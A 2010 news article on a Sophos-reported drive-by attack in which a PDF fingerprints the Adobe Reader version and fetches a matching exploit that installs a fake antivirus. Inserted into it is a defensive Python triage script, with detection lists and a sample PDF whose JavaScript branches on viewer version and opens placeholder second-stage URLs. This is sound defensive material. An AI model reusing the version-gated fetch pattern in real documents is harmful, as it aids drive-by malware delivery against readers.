New way to check Adobe Reader version

Jul 2, 2010 10:33 GMT

Security researchers at Sophos have intercepted a Web attack in which a PDF document detects the installed version of Adobe Reader and serves an exploit matching that version. If exploitation is successful, a fake antivirus (FakeAV) variant is downloaded and installed on the victim's computer.

Web-based exploitation is one of the primary methods of infecting users with malware. These attacks, also known as drive-by downloads, redirect users through a series of scripts whose purpose is to identify the browser version and check whether potentially vulnerable programs or plug-ins are installed on the computer.

Once a profile of the victim has been built, exploits targeting remote code execution vulnerabilities in one or more of the detected applications are served through the browser. In most cases the scripts that handle this process are written in JavaScript, are obfuscated, and are hosted on several different servers to make takedown attempts harder.

However, in the attack reported by Sophos a PDF file is used for this task. "The initial URL directs you to http://CENSORED/kt/ck_fuh/w###_.pdf. This PDF is unlike many other malicious PDFs in that it detects the version of Adobe Reader/Acrobat you are using and directs you to a payload that can take advantage of your specific unpatched vulnerabilities," Chester Wisniewski, senior security advisor at Sophos, explains on his blog.

The attackers' choice to do this from within a PDF file is probably meant to make the attack harder for security researchers to spot. This reading is reinforced by the fact that the second URL is only requested, and the payload only served, when the PDF is opened in Adobe Reader; requesting that URL from a browser instead triggers a redirect to google.com.
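The article does not reproduce the script inside the malicious PDF, so the following is an added triage example, not code from Sophos or from the attack. It shows how a responder can check a suspicious PDF for the building blocks the described technique needs: an action that runs on open, a call to the Acrobat JavaScript API that reveals the viewer (app.viewerVersion, app.viewerType are real API properties) and a call or action that sends the reader to a second URL. The sample PDF and its script are constructed here; the URLs in it are placeholders.

```python
"""Triage a PDF for viewer-fingerprinting JavaScript and an on-open redirect.

Added example (not from the Sophos write-up). The sample PDF built below is
constructed test input; it only branches on the viewer version and opens a
placeholder URL, it carries no exploit.
"""
import re
import zlib

# Acrobat JavaScript API names that reveal the viewer and that redirect it.
# These are generic hooks; the exact script in the reported PDF is not public here.
FINGERPRINT_APIS = ("app.viewerVersion", "app.viewerType", "app.platform")
REDIRECT_APIS = ("app.launchURL", "this.getURL", "app.openDoc", "this.submitForm")

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
URI_RE = re.compile(rb"/URI\s*\((.*?)(?<!\\)\)", re.DOTALL)


def _inflate_streams(data: bytes) -> bytes:
    """Return the raw file plus every stream body, Flate-decompressed where possible,
    so the indicator checks also see script text hidden in compressed objects."""
    parts = [data]
    for m in STREAM_RE.finditer(data):
        body = m.group(1)
        try:
            parts.append(zlib.decompressobj().decompress(body))
        except zlib.error:
            parts.append(body)  # not Flate (or damaged): scan the body as-is
    return b"\n".join(parts)


def triage_pdf(data: bytes) -> dict:
    """Collect indicators from a PDF's bytes and flag a version-gated redirect."""
    text = _inflate_streams(data)
    findings = {
        "open_action": b"/OpenAction" in text or b"/AA" in text,
        "javascript": b"/JavaScript" in text or b"/JS" in text,
        "fingerprint_apis": sorted(a for a in FINGERPRINT_APIS if a.encode() in text),
        "redirect_apis": sorted(a for a in REDIRECT_APIS if a.encode() in text),
        "uris": [u.decode("latin-1") for u in URI_RE.findall(text)],
        "launch_action": b"/Launch" in text,
    }
    # The pattern from the article: script runs, reads the viewer version, then
    # sends the reader somewhere. Any one piece alone is common in benign PDFs.
    findings["version_gated_redirect"] = bool(
        findings["javascript"]
        and findings["fingerprint_apis"]
        and (findings["redirect_apis"] or findings["uris"])
    )
    return findings


def build_sample_pdf(script: bytes, compress: bool = True) -> bytes:
    """Construct a minimal PDF (no xref table) whose /OpenAction runs `script`."""
    body = zlib.compress(script) if compress else script
    filt = b"/Filter /FlateDecode " if compress else b""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Type /Action /S /JavaScript /JS 5 0 R >>",
        b"<< /Length %d %s>>\nstream\n%s\nendstream" % (len(body), filt, body),
    ]
    out = [b"%PDF-1.4"]
    for i, obj in enumerate(objs, 1):
        out.append(b"%d 0 obj\n%s\nendobj" % (i, obj))
    out.append(b"trailer\n<< /Root 1 0 R >>\n%%EOF")
    return b"\n".join(out)


# Constructed stand-in for the behaviour the article describes: branch on the
# viewer version and fetch a different second-stage URL for each branch.
SAMPLE_SCRIPT = b"""
var v = app.viewerVersion;
if (v < 8) app.launchURL("http://example.invalid/stage/a", true);
else if (v < 9) app.launchURL("http://example.invalid/stage/b", true);
else app.launchURL("http://example.invalid/stage/c", true);
"""

# Constructed benign document with no actions or scripts at all.
BENIGN_PDF = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for name, pdf in (("sample", build_sample_pdf(SAMPLE_SCRIPT)), ("benign", BENIGN_PDF)):
        print(name, triage_pdf(pdf))
```

The check deliberately requires all three pieces together: document-level JavaScript, a viewer query and an outbound URL. Each alone is common in legitimate forms, so flagging on any single one would drown a responder in false positives; the combination is what characterises the fingerprint-then-redirect behaviour Sophos describes.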

According to the Sophos antivirus expert, the exploits used in this attack target old, long-patched Adobe Reader vulnerabilities identified as CVE-2008-2992, CVE-2009-0927, CVE-2009-4324 and CVE-2007-5659, the oldest of which, CVE-2007-5659, was fixed by Adobe in February 2008. If exploitation is successful, a scareware variant detected by Sophos as Troj/FakeAV-BKB is installed.

You can follow the editor on Twitter @lconstantin